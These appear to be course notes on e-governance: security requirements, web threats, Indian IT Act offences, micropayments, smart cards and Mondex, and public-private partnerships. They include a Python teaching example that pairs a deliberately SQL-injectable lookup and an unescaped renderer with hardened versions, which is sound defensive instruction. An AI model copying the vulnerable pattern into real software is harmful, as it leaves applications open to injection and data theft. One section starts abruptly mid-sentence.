Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries' readiness to harness the potential efficiencies of ICT. Broadband penetration has increased dramatically in most OECD member countries in the past five years, as countries have made significant investments in their telecommunications infrastructure.

SECURITY ISSUES IN E-GOVERNANCE

1. INTRODUCTION

The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions. In particular, the networking potential offered by the Internet and related technologies has the potential to transform the structures and operation of government.

The effective management of information security is a key factor, as the willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have in the data security of the service.

2. INFORMATION SECURITY

A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens.

The process approach for an information security management system (ISMS) encourages its users to emphasize the importance of:

- understanding an organization's information security requirements and the need to establish policy and objectives for information security;
- implementing and operating controls to manage an organization's information security risks in the context of the organization's overall business risks;
- monitoring and reviewing the performance and effectiveness of the ISMS;
- continual improvement based on objective measurement.

Data security requires a set of security requirements:

- Authentication: the capability to identify who is using the services (person or software program); the process of verifying that you are who you say you are.
- Authorization: the capability to grant rights of access to resources; the process of verifying that someone has the rights to do what she is trying to do.
- Confidentiality: the capability to prevent unauthorized access to information.
- Integrity: the capability to prevent information from unauthorized modification, ensuring that information can be relied upon and is accurate and complete.
- Traceability: the capability to chronologically interrelate any transaction to the person or system that performed the action, in a way that is verifiable.
- Non-repudiation: the capability to prevent the person or system involved in an event or action from denying or challenging their participation in the event.

Examples of organizational and technical measures to prevent unauthorized access and processing are:

- Protecting premises, equipment and systems software, including input/output units
- Protecting software applications used to process personal data
- Preventing unauthorized access to personal data during transmission thereof, including transmission via telecommunication means and networks
- Ensuring effective methods of blocking, destruction, erasure or anonymization of personal data
- Enabling subsequent determination of when individual personal data were entered into a filing system, used or otherwise processed, and the person responsible, for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data

Although trusted security and privacy measures constitute a crucial success factor for e-Government, this has not yet been addressed: as the UN 2012 Survey shows, only 20% of national portals clearly indicate the presence of security features. Europe is leading, with 44 countries displaying secure links on their national websites, but the survey does not consider regional and local websites, nor the many decentralized public organization web portals.

3. INFORMATION SECURITY THREATS

Services provided by e-Government to citizens, enterprises, public officers, government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats. Detailed examples exist of cyber attacks using techniques such as packet sniffers, probes, malware, internet infrastructure attacks, denial of service attacks, remote-to-local attacks and user-to-root attacks. The successful adoption of an ISMS is important to protect information assets, allowing an organization to:

- Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
- Maintain a structured and comprehensive framework for identifying and assessing information security risks, selecting and applying applicable controls, and measuring and improving their effectiveness
- Continually improve its control environment
- Effectively achieve legal and regulatory compliance

There are simple and well-known web application vulnerabilities that could be avoided, but e-Government websites are still vulnerable. A research work found 816 e-Government websites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection. An SQL injection attack can compromise data integrity, while XSS is a vulnerability which attackers may exploit to steal users' information.
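As an added illustration of the two vulnerability classes named above (written for these notes, not code from the cited research or from any real portal), the following Python shows a citizen-lookup handler for a hypothetical e-Government service first in the vulnerable form and then hardened: a bound parameter in place of string-built SQL, and HTML escaping in place of raw interpolation. The table, applicant names and service records are constructed.

```python
import html
import sqlite3

# Constructed sample data standing in for a hypothetical service-request table.
SAMPLE_ROWS = [
    (1, "Asha Verma", "Passport renewal", "approved"),
    (2, "Sean O'Brien", "Birth certificate", "pending"),
    (3, "Li Wei", "Trade licence", "rejected"),
]


def make_db() -> sqlite3.Connection:
    """Build an in-memory database holding the constructed records."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE requests (id INTEGER PRIMARY KEY, applicant TEXT, "
        "service TEXT, status TEXT)"
    )
    conn.executemany("INSERT INTO requests VALUES (?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, applicant: str) -> list:
    # BAD: the applicant name is pasted into the SQL text. Any quote character
    # in the input changes the structure of the statement the database parses,
    # which is exactly what SQL injection relies on.
    sql = "SELECT id, service, status FROM requests WHERE applicant = '%s'" % applicant
    return conn.execute(sql).fetchall()


def lookup_hardened(conn: sqlite3.Connection, applicant: str) -> list:
    # GOOD: the name travels as a bound parameter. The driver never lets it
    # alter the statement, so the quote in "O'Brien" is just data.
    sql = "SELECT id, service, status FROM requests WHERE applicant = ?"
    return conn.execute(sql, (applicant,)).fetchall()


def render_vulnerable(applicant: str, status: str) -> str:
    # BAD: stored text is placed in the page verbatim, so any markup an
    # applicant managed to save would be interpreted by the next visitor's
    # browser (stored XSS).
    return "<p>Request for %s: %s</p>" % (applicant, status)


def render_hardened(applicant: str, status: str) -> str:
    # GOOD: html.escape converts <, >, &, and quotes to entities, so the
    # browser displays the characters instead of treating them as markup.
    return "<p>Request for %s: %s</p>" % (html.escape(applicant), html.escape(status))


def demo() -> dict:
    """Run both versions against the same inputs and collect what happened."""
    conn = make_db()
    out = {}
    try:
        # The legitimate apostrophe in the name breaks the hand-built SQL:
        # proof that input reaches the SQL parser as code, not as a value.
        lookup_vulnerable(conn, "Sean O'Brien")
        out["vulnerable_error"] = None
    except sqlite3.OperationalError as exc:
        out["vulnerable_error"] = type(exc).__name__
    out["hardened_rows"] = lookup_hardened(conn, "Sean O'Brien")
    # Markup in a stored name is rendered as-is by the first version and
    # neutralised by the second.
    out["vulnerable_html"] = render_vulnerable("<b>Li Wei</b>", "rejected")
    out["hardened_html"] = render_hardened("<b>Li Wei</b>", "rejected")
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```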

Specific security measures like firewalls, intrusion detection software, encryption and secure networks must be defined, designed and implemented for government agencies to provide the appropriate levels of security. But information security must also take into consideration the people and processes that rely on the systems. Employees with daily access to e-Government systems must be trained on cybersecurity, and this aspect must become part of their job. A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies.


CYBER CRIME AND LAWS

The expression 'Crime' is defined as an act which subjects the doer to legal punishment, or any offence against morality, social order, or any unjust or shameful act. The "Offence" is defined in the Code of Criminal Procedure to mean an act or omission made punishable by any law for the time being in force.

Cyber Crime is emerging as a serious threat. Worldwide, governments, police departments and intelligence units have started to react.

Cyber Crime is a term used to broadly describe criminal activity in which computers or computer networks are a tool, a target, or a place of criminal activity, and includes everything from electronic cracking to denial of service attacks. It is also used to include traditional crimes in which computers or networks are used to enable the illicit activity.

Computer crime mainly consists of unauthorized access to computer systems, data alteration, data destruction, and theft of intellectual property. Cyber crime in the context of national security may involve hacking, traditional espionage, or information warfare and related activities.

Pornography, Threatening Email, Assuming someone's Identity, Sexual Harassment, Defamation, Spam and Phishing are some examples where computers are used to commit crime, whereas Viruses, Worms, Industrial Espionage, Software Piracy and Hacking are examples where computers become the target of crime.

Cyber Crime Variants

Hacking: Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. Hacking had witnessed a 37 per cent increase this year.

Cyber Squatting: Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune. This is an issue that has not been tackled in the IT Act 2000.

Phishing: Phishing is just one of the many frauds on the Internet trying to fool people into parting with their money. Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions requesting them to enter their Username, Password or other personal information to access their Account for some reason. The fraudster then has access to the customer's online bank account and to the funds contained in that account.

Cyber Stalking: Cyber Stalking is the use of the Internet or other electronic means to stalk someone. This term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.


Vishing: Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "Voice" and "phishing". Vishing exploits the public's trust in landline telephone services. Vishing is typically used to steal credit card numbers or other information used in identity theft schemes from individuals.

A rapidly growing online user base:

- 121 Million Internet Users
- 65 Million Active Internet Users, up by 28% from 51 million in 2010
- 50 Million users shop online on Ecommerce and Online Shopping Sites
- 46+ Million Social Network Users
- 346 million mobile users had subscribed to Data Packages


CYBER LAW

(1) Whoever, with the intent to cause or knowing that he is likely to cause wrongful loss or damage to the public or any person, destroys or deletes or alters any information residing in a computer resource or diminishes its value or utility or affects it injuriously by any means, commits hacking.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Section 43

Whoever, without permission of the owner of the computer:

- Secures access;
- Downloads, copies or extracts any data, computer database or any information;
- Introduces or causes to be introduced any virus or contaminant;
- Disrupts or causes disruption;
- Denies or causes denial of access to any person;
- Provides any assistance to any person to facilitate access;
- Charges the services availed of by a person to the account of another person by tampering with or manipulating any computer, computer system or computer network;
- Destroys, deletes or alters any information residing in a computer resource or diminishes its value or utility or affects it injuriously by any means;
- Steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter, any computer source code used for a computer resource with an intention to cause damage;

shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected.

"If any person, dishonestly or fraudulently, does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to three years or with fine which may extend to five lakh rupees or with both." [S66]

S66A - Punishment for sending offensive messages through communication service, etc.

Any person who sends, by means of a computer resource or a communication device:

- any information that is grossly offensive or has menacing character; or


- any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently makes by making use of such computer resource or a communication device; or
- any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience or to deceive or to mislead the addressee or recipient about the origin of such messages,

shall be punishable with imprisonment for a term which may extend to three years and with fine.

S66C - Punishment for identity theft

"Whoever, fraudulently or dishonestly, makes use of the electronic signature, password or any other unique identification feature of any other person shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh."

S66D - Punishment for cheating by personation by using computer resource

"Whoever, by means of any communication device or computer resource, cheats by personation shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees."

S66E - Punishment for violation of privacy

"Whoever intentionally or knowingly captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years or with fine not exceeding two lakh rupees, or with both."

S67A - Punishment for publishing or transmitting of material containing sexually explicit act, etc. in electronic form

"Whoever publishes or transmits or causes to be published or transmitted in the electronic form any material which contains sexually explicit act or conduct shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees."

S67C - Preservation and Retention of information by intermediaries

"(1) Intermediary shall preserve and retain such information as may be specified for such duration and in such manner and format as the Central Government may prescribe.

(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub-section (1) shall be punished with an imprisonment for a term which may extend to three years and shall also be liable to fine."


IT ACT

The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of the Indian Parliament (No. 21 of 2000) notified on October 17, 2000. This act is being opposed by the Save Your Voice campaign and other civil society organizations in India. User-review and consumer social networking site MouthShut.com has filed a writ petition in the Supreme Court of India to repeal and nullify parts of the IT Act 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated 30 January 1997, has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission on International Trade Law. This is referred to as the UNCITRAL Model Law on E-Commerce.

Following the UN Resolution, India passed the Information Technology Act 2000 in May 2000, which came into force on October 17, 2000. The Information Technology Act 2000 has been substantially amended through the Information Technology (Amendment) Act 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008. It got Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act has provided additional focus on information security. It has added several new sections on offences, including cyber terrorism and data protection. A set of Rules related to sensitive personal information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was notified in April 2011.

Provisions:

The Information Technology Act 2000 consisted of 94 sections segregated into 13 chapters. Four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced. Schedules III and IV are deleted.

The Information Technology Act 2000 addressed the following issues:

1. Legal recognition of electronic documents
2. Legal recognition of digital signatures
3. Offenses and contraventions
4. Justice dispensation systems for cybercrimes

Offences:

Section 65 - Tampering with computer source documents: intentional concealment, destruction or alteration of source code when the computer source code is required to be kept or maintained by law for the time being in force. Punishment: imprisonment up to three years, or/and with fine up to 2 lakh rupees.

Section 66 - Hacking. Punishment: imprisonment up to three years, or/and with fine up to 5 lakh rupees.

Section 66-A - Sending offensive message through electronic means: sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will, etc., or sending such mail intended to deceive or to mislead the addressee or recipient about the origin of such messages. Punishment: imprisonment up to three years and with fine.

Criticisms:

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some of the cyber law observers have criticized the amendments on the ground of lack of legal and procedural safeguards to prevent violation of the civil liberties of Indians. There has also been appreciation of the amendments from many observers because they address the issue of Cyber Security.

Section 69 empowers the Central Government/State Government and its authorized agency to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient so to do in the interest of the sovereignty or integrity of India, defence of India, security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for investigation of any offence. They can also secure assistance from computer personnel in decrypting data (see mandatory decryption) under penalty of imprisonment.

Section 66A is widely criticized. It has led to numerous abuses reported by the press. Section 66A has also been criticised and challenged in the Lucknow and Madras High Courts for its constitutional validity. Based on Section 66A, the Bombay High Court has held that creating a website and storing false information on it can entail cyber crime.


one-time micropayments to multiple sellers. Seller-based accounts are more common for repeat business with an individual enterprise.

Once a common micropayment standard has been established, some experts predict that streaming media sites, music and application downloads, content vendors, sports access sites and other specialized resources will make pay-per-use common online.

Advantages and risks:

With a micropayment system, many small transactions are summarised over a defined period of time and charged in one bill. For that reason micropayments are applicable for businesses where even small costs for every single transaction would be inefficient. 4) The main benefits from the customer side in using micropayment are speed and flexibility. From the merchants' side, speed and acceptable transaction fees are very important. As the transactions involve small capital, security does not have the highest priority. Much more important than security is trust: users and merchants are more likely to use an insecure payment system from a trusted company than a secure payment system from an untrusted (unknown) company. Therefore the market entry barriers for new providers are high. Any company that wishes to enter this area must have plenty of capital and be willing to invest a lot before return on investment, as it is extremely difficult for new payment systems to achieve widespread acceptance.

Payment options:

Micropayment providers offer various payment modules. Merchants need to sign up for an account with a chosen provider and decide on a module that suits their needs. The customer gets an option (or options) for how to pay for the desired content or goods.

The most common micropayment options are listed below. 6)

Call2pay: Payment by telephone. The customer is requested to call a toll number. The fee is set on a per-call basis for the desired payment amount.

Handypay: Payment via mobile phone bill. The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment.

Ebank2pay: Payment using online banking. The customer transfers the payment amount using his or her online banking access and a TAN. After making payment, the customer receives access to the purchased product.

Credit card: Payment per credit card. The customer enters his credit card data and confirms the transaction. The transactions can optionally be carried out with the 3-D Secure™ method (Verified by VISA™ and Mastercard SecureCode™).

Direct debit: Payment by direct debit. The customer enters his or her bank ID and account number and confirms the direct debit authorization.

PayPal MicroPayments is a micropayment system that charges payments to users' PayPal accounts and allows transactions of less than US$12 to take place. The service is, as of 2013, offered in select currencies only.

Micropayment Uses:

- Publishing
- Marketing
- Software
- Entertainment
- Web Services

SMART CARD

A smart card, chip card, or integrated circuit card (ICC) is any pocket-sized card with embedded integrated circuits. Smart cards are made of plastic, generally polyvinyl chloride, but sometimes polyethylene terephthalate based polyesters, acrylonitrile butadiene styrene or polycarbonate. Since April 2009, a Japanese company has manufactured reusable financial smart cards made from paper.

Smart cards can provide identification, authentication, data storage and application processing. Smart cards may provide strong security authentication for single sign-on (SSO) within large organizations.

A smart card is any pocket-sized card with embedded integrated circuits which can process data. This implies that it can receive input which is processed and delivered as an output.

What is a Smart Card?

- Standard credit card-sized, with a microchip embedded on it
- Two types: memory-only chips and microprocessor chips
- Can hold up to 32000 bytes
- Newer smart cards have math co-processors


- Perform complex encryption routines quickly
- In 1968, German inventors patented the combination of plastic cards with microchips

Construction of Smart Cards


Why Smart Cards?

- Improve the convenience and security of any transaction
- Provide tamper-proof storage of user and account identity
- Provide vital components of system security
- Protect against a full range of security threats

Advantages:

- Flexibility
- Security
- Portability
- Increasing data storage capacity
- Reliability

Schematic overview of a smart card


Smart card Processing

Smart Card Applications:

- Ticketless travel: Seoul bus system (4M cards, 1B transactions since 1996); planned for the SF Bay Area system
- Authentication, ID
- Medical records
- Ecash
- Store loyalty programs
- Personal profiles
- Government: Licenses
- Mall parking
- Example: Mondex


OVERVIEW OF MONDEX

Mondex is a smart card electronic cash system which was originally developed by National Westminster Bank in the United Kingdom and subsequently sold to MasterCard International. Mondex launched in a number of markets during the 1990s, expanding from an original trial in Swindon, UK to Hong Kong, Guelph and New York. It was also trialled on several British university campuses from the late 1990s, including the University of Edinburgh, University of Exeter (between 1997 and 2001), University of York, University of Nottingham, Aston University and Sheffield Hallam University.

- Direct transfer of electronic money between two cards
- Transfer of electronic money over the Internet or telephone networks, etc.
- Keep transaction records
- Password protection and "lock card" functions
- Portable balance finder to check balance
- Support for multiple currencies


ADVANTAGES

CONSUMER:
- Convenience
- Accessibility
- On-chip record of recent transactions
- Home load
- Internet purchases

MERCHANT:
- Reliable off-line payment
- Higher security
- Low transaction cost
- Reduced cash handling

FINANCIAL INSTITUTION:
- Strengthen customer relationships
- New financial and commercial partnerships

Mondex is a concept for an electronic payment system that provides an alternative to cash, particularly small currency and coins (micro-payment). The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK.

In July 1996, initiated by NatWest and Midland Bank PLC, Mondex International Ltd was officially established by 17 major banks from North America, Asia/Pacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept, technology and brand. In the same year, MasterCard International acquired 51% ownership of Mondex International and fully endorsed the Mondex technology architecture.

How does Mondex Protect Privacy?

Principles protected:
  o Limits for collecting personal information
  o Limits for using, disclosing and keeping personal information
  o Keeping personal information accurate
  o Safeguarding personal information


Limits for collecting personal information
  o loads from account
  o deposits into account
  o lost transactions

Limits for using, disclosing and keeping personal information
  o safeguard deposits
  o to reimburse for non-performance

Keeping personal information accurate
  o load and unload are online
  o rolling 10 transactions provides exact spend and retailer name

Safeguarding personal information
  o firewalls in Multos - between applications - ITSEC 6 designation
  o transaction data to retailer is deliberately limited
  o individual transaction data is not collected by banks - Mondex is an unaudited system


The design of a Mondex smart card allows end users to transfer funds electronically onto the card and then use the card to make purchases up to the total cash value held on it. Mondex smart cards provide an electronic payment system using all the capabilities associated with smart card technology. The Mondex smart card can be a convenient alternative to cash.

Although the design was five years old at the time, the Mondex smart card was actually launched in 1995, two years before MasterCard assumed control of the technology.

The banks that currently support the Mondex smart card include National Bank of Canada, Scotiabank, Canada Trust, Bank of Montreal, Le Mouvement des caisses Desjardins and Toronto Dominion Bank. With so many respected lending institutions banking on the idea, the Mondex smart card is worth a closer look.

The Mondex smart card has the ability to make card-to-card transfers, which is not possible with standard credit or debit cards. When you use a credit/debit card to make a purchase, communication is required between the bank and your card. Mondex cards, however, contain an embedded microprocessor with encryption and tamper-resistant hardware designed to protect them from attackers. The ability of the Mondex smart card to do offline transactions means it is less dependent on expensive network infrastructure, reducing transaction costs. Offline transactions may seem anonymous; however, they are actually recorded in the memory of the card's microprocessor and remain retrievable the next time the card is used at an ATM, or as soon as the retailer uploads transaction data to the bank computer.

A significant disadvantage of Mondex is that transactions aren't truly anonymous. Unlike pre-paid phone cards, which are also based on smart card technology, you can't purchase a Mondex card without revealing your identity: each card has a unique identification number through which the owner can easily be identified. Mondex smart cards have not been as successful as originally predicted, and customers have not been especially satisfied with the card and its services. Unlike a credit or debit card, your money may be lost forever if you lose a Mondex smart card; losing a Mondex card is just like losing a wallet full of cash. With a credit card you're protected against any loss exceeding $50. This protection is not currently available with a Mondex smart card.

According to Mondex, the smart card system is fully auditable: there is a log of the time, date, amount and participants of each transaction, which undermines the privacy of users. Technically, however, Mondex can't claim to be a fully auditable system. After a number of transactions, overflow can occur as a result of the limited memory in the Mondex smart cards. This means that significant data may be lost before Mondex is able to retrieve it. Critics say this loss of data is a critical design flaw, making it difficult for Mondex to reliably detect fraud. While Mondex smart cards are not a hundred percent secure, they do possess the ability to tolerate minor fraud loss.
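The overflow critique above can be made concrete. The following is an added example, not Mondex's own code or protocol: a toy stored-value purse whose rolling log keeps only the last 10 transfers, with a hypothetical per-purse transaction counter so that the bank's reconciliation can at least count how many entries were overwritten before upload. The names (Purse, reconcile, log_explains_balance) and the scenario are constructed for this example.

```python
"""Offline stored-value purse with a rolling, fixed-size transaction log.

Added example, not Mondex's own code or protocol. Assumptions (hypothetical):
each purse keeps a monotonically increasing transaction counter, and the
rolling log holds the last LOG_CAPACITY entries, as the text describes for
the "rolling 10 transactions". The bank only sees the log when the card is
next presented online (ATM or retailer upload).
"""
from collections import deque
from dataclasses import dataclass, field

LOG_CAPACITY = 10


@dataclass(frozen=True)
class LogEntry:
    seq: int            # purse-local counter, never reused
    counterparty: str   # card id, retailer id, or "BANK"
    amount: int         # cents; positive = value received, negative = paid out


@dataclass
class Purse:
    card_id: str
    balance: int = 0
    next_seq: int = 0
    # deque(maxlen=...) silently discards the oldest entry when full: this is
    # the "overflow" the critics describe.
    log: deque = field(default_factory=lambda: deque(maxlen=LOG_CAPACITY))

    def _record(self, counterparty: str, amount: int) -> LogEntry:
        entry = LogEntry(self.next_seq, counterparty, amount)
        self.next_seq += 1
        self.log.append(entry)
        return entry

    def load(self, amount: int) -> LogEntry:
        """Online load from the cardholder's bank account."""
        if amount <= 0:
            raise ValueError("load amount must be positive")
        self.balance += amount
        return self._record("BANK", amount)

    def pay(self, payee: "Purse", amount: int) -> None:
        """Offline card-to-card transfer: no bank or network involved."""
        if amount <= 0 or amount > self.balance:
            raise ValueError("insufficient value on card")
        self.balance -= amount
        payee.balance += amount
        self._record(payee.card_id, -amount)
        payee._record(self.card_id, amount)


def reconcile(purse: Purse, last_uploaded_seq: int = -1) -> dict:
    """Upload of the rolling log at the next online contact.

    last_uploaded_seq is the highest counter value the bank already holds
    (-1 if the card has never been uploaded). Counter values between that
    and the oldest surviving entry were overwritten on the card and can no
    longer be audited; the gap in the counter at least reveals how many.
    """
    new_entries = [e for e in purse.log if e.seq > last_uploaded_seq]
    oldest_surviving = new_entries[0].seq if new_entries else purse.next_seq
    lost = oldest_surviving - (last_uploaded_seq + 1)
    return {"retrieved": new_entries, "lost": lost, "complete": lost == 0}


def log_explains_balance(purse: Purse) -> bool:
    """True only if the surviving log accounts for the whole balance.

    Once entries have been overwritten this fails, so the bank can no longer
    reconstruct how the value on the card was spent.
    """
    return sum(e.amount for e in purse.log) == purse.balance


def demo() -> dict:
    """Constructed scenario: one load, then eleven small offline payments."""
    alice, bob = Purse("card-A"), Purse("card-B")
    alice.load(1000)                 # seq 0 on alice
    for _ in range(11):              # seq 1..11 on alice, 0..10 on bob
        alice.pay(bob, 10)
    return {
        "alice": alice, "bob": bob,
        "alice_upload": reconcile(alice),
        "bob_upload": reconcile(bob),
    }


if __name__ == "__main__":
    d = demo()
    print("alice balance:", d["alice"].balance,
          "lost entries:", d["alice_upload"]["lost"],
          "log explains balance:", log_explains_balance(d["alice"]))
```

Once the counter gap is non-zero the surviving log no longer accounts for the card's balance, which is exactly why the loss matters for fraud detection; uploading before ten further transactions have occurred keeps the record complete.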

Mondex believes its electronic payment system is secure, and is convinced that critics who have voiced concern over security issues are mistaken and misinformed. Perhaps the use of a Mondex smart card depends on a personal level of trust.

E-GOVERNANCE

Although the term 'e-Governance' has gained currency in recent years, there is no standard definition of it. Different governments and organizations define the term to suit their own aims and objectives. Sometimes the term 'e-government' is used instead of 'e-Governance'.

Several dimensions and factors influence the definition of e-governance, or electronic governance. The word "electronic" in the term implies technology-driven governance. E-governance is the application of information and communication technology (ICT) for delivering government services, exchanging information, communication transactions, and integrating various stand-alone systems and services between government-to-citizen (G2C), government-to-business (G2B) and government-to-government (G2G), as well as back-office processes and interactions within the entire government framework. Through e-governance, government services are made available to citizens in a convenient, efficient and transparent manner. The three main target groups that can be distinguished in governance concepts are government, citizens, and businesses/interest groups. In e-governance there are no distinct boundaries.

Generally, four basic models are available: government-to-citizen (customer), government-to-employees, government-to-government and government-to-business.

Difference between E-Government and E-Governance

Both terms are often treated as the same; however, there is some difference between the two. E-government is the use of ICTs in public administration, combined with organizational change and new skills, to improve public services and democratic processes and to strengthen support to the public. The problem with taking this as a definition of e-governance is that it makes no provision for the governance of ICTs. As a matter of fact, the governance of ICTs most probably requires a substantial increase in regulation and policy-making capabilities, with all the expertise and opinion-shaping processes among the various social stakeholders of these concerns. So the perspective of e-governance is the use of technologies that both help in governing and have to be governed. Public-Private Partnership (PPP) based e-governance projects have been hugely successful in India. United Telecoms Limited, known as UTL, is a major player in India in PPP-based e-governance projects; each such project involved a mammoth state-wide area network.

E-governance is the future many countries are looking forward to for a corruption-free government. E-government is a one-way communication protocol, whereas e-governance is a two-way communication protocol. The essence of e-governance is to reach the beneficiary and ensure that the services intended for the desired individual have actually reached them. There should be an auto-response to support the essence of e-governance, whereby the Government learns the efficacy of its governance. E-governance is by the governed, for the governed and of the governed.

Establishing the identity of the end beneficiary is a challenge in all citizen-centric services. Statistical information published by governments and world bodies does not always reveal the facts. The best form of e-governance cuts down on the unwanted interference of too many layers while delivering governmental services. It depends on a good infrastructural setup, with the support of local processes and parameters, for governments to reach their citizens or end beneficiaries. Budgets for planning, development and growth can be derived from well laid out e-governance systems.

Why e-Governance?

E-Government can transform citizen service, provide access to information to empower citizens, enable their participation in government, and enhance citizens' economic and social opportunities, so that they can make better lives for themselves and for the next generation.

BASIC ARCHITECTURE


A suggested architecture for e-Governance is shown in the diagram, where it is illustrated that applications from various departments can be integrated together so as to be accessed by any terminal or computer from any other department, or from anywhere, through the network. This is possible because of the characteristics of CORBA: it is location transparent, language independent, implementation independent and operating system independent. The applications connected through CORBA/IIOP could be legacy applications wrapped to suit the CORBA specifications, new Web applications, or even a database environment using Oracle etc. Seamless interconnection, and thereby effective utility of the entire e-Governance system, is possible if the middleware is designed to provide the necessary services such as Transactions, Database Management, Messaging and Naming.

Regarding security aspects, the CORBA Security standard is built around existing security specifications such as the Distributed Computing Environment (DCE), the Kerberos protocol and the Generic Security Service API (GSS-API). While the standard is heavily weighted towards these technologies, public key security with the Secure Sockets Layer (SSL) is what is popular for Internet-based transactions.

Types of Interactions in e-Governance

e-Governance facilitates interaction between different stakeholders in governance. These interactions may be described as follows:

G2G (Government to Government)

In this case, Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities. This kind of interaction is only within the sphere of government and can be either horizontal, i.e. between different government agencies as well as between different functional areas within an organization, or vertical, i.e. between national, provincial and local government agencies as well as between different levels within an organization. The primary objective is to increase efficiency, performance and output.


G2C (Government to Citizens)

In this case, an interface is created between the government and citizens which enables the citizens to benefit from the efficient delivery of a large range of public services. This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other. It gives citizens the choice of when to interact with the government (e.g. 24 hours a day, 7 days a week), from where to interact with the government (e.g. a service centre, an unattended kiosk, or from one's home/workplace) and how to interact with the government (e.g. through internet, fax, telephone, email, face-to-face, etc.). The primary purpose is to make government citizen-friendly.

G2B (Government to Business)

Here, e-Governance tools are used to aid the business community (providers of goods and services) to seamlessly interact with the government. The objective is to cut red tape, save time, reduce operational costs and create a more transparent business environment when dealing with the government. G2B initiatives can be transactional, such as licensing, permits, procurement and revenue collection. They can also be promotional and facilitative, such as in trade, tourism and investment. These measures help to provide a congenial environment for businesses, enabling them to perform more efficiently.

G2E (Government to Employees)

Government is by far the biggest employer and, like any organization, it has to interact with its employees on a regular basis. This interaction is a two-way process between the organization and the employee. Use of ICT tools helps in making these interactions fast and efficient on the one hand, and increases the satisfaction levels of employees on the other.

Difference between G2B and B2G

Government to business (G2B): refers to the conducting of transactions between government bodies and business via the internet.

Business to government (B2G): professional affairs conducted between companies and regional, municipal or federal governing bodies. B2G typically encompasses the determination and evaluation of proposals and the completion of contracts.

PUBLIC PRIVATE PARTNERSHIPS

• Agreement between Government and the Private Sector for the provision of a public good or service by the latter

• Generally, but not always, involving:

  - Long-term contracts

  - User charges and/or payments flowing between the parties

  - Shared investments, but mainly private

  - Risk sharing by the parties

• Must be a partnership

A public-private partnership exists when public sector agencies (federal, state or local) join with private sector entities (companies, foundations, academic institutions or citizens) and enter into a business relationship to attain a commonly shared goal that also achieves the objectives of the individual partners.

Why do them?

• Fiscal head room

• As a way of financing the project

• Separate policy & regulation from operations

• Make the good or service available

• Pay for performance and output

• Introduce competition, for and in the market


The Need to Set the Right Priorities

Four Basic Dimensions of P3

Although each is unique, all P3s include four basic characteristics:

• Shared goals

• Shared resources (time, money, expertise, people)

• Shared risks

• Shared benefits

Benefits:

• Expedited project completion

• Project cost savings

• Improved quality

• Use of private resources

• Access to new sources of private capital

Two Major Steps


• Crafting the Partnership

• Implementing the Partnership

Project Management -

Six Distinct Phases

Genesis

What's the need?

What's driving the need (the rationale)? Facility non-compliance, natural disaster, budget deficit

Is there a need for a Public/Private Partnership?


Preliminary Project Definition

Feasibility

Is a Public/Private Partnership feasible, not only financially but practically? Can it be done?

Market Research

Economic/Financial Analysis

Program Budget and Schedule

Risk Analysis

Plan and Test

Final project definition

What is the best way to complete the project?

Has the plan been thoroughly tested to assess market demand, public and stakeholder feedback, and economics?

Master Schedule/Budget

Political Climate

Any potential "fatal flaws" that could derail the project?

Procurement and Contracting

How do you choose and contract with the best-value private partner?

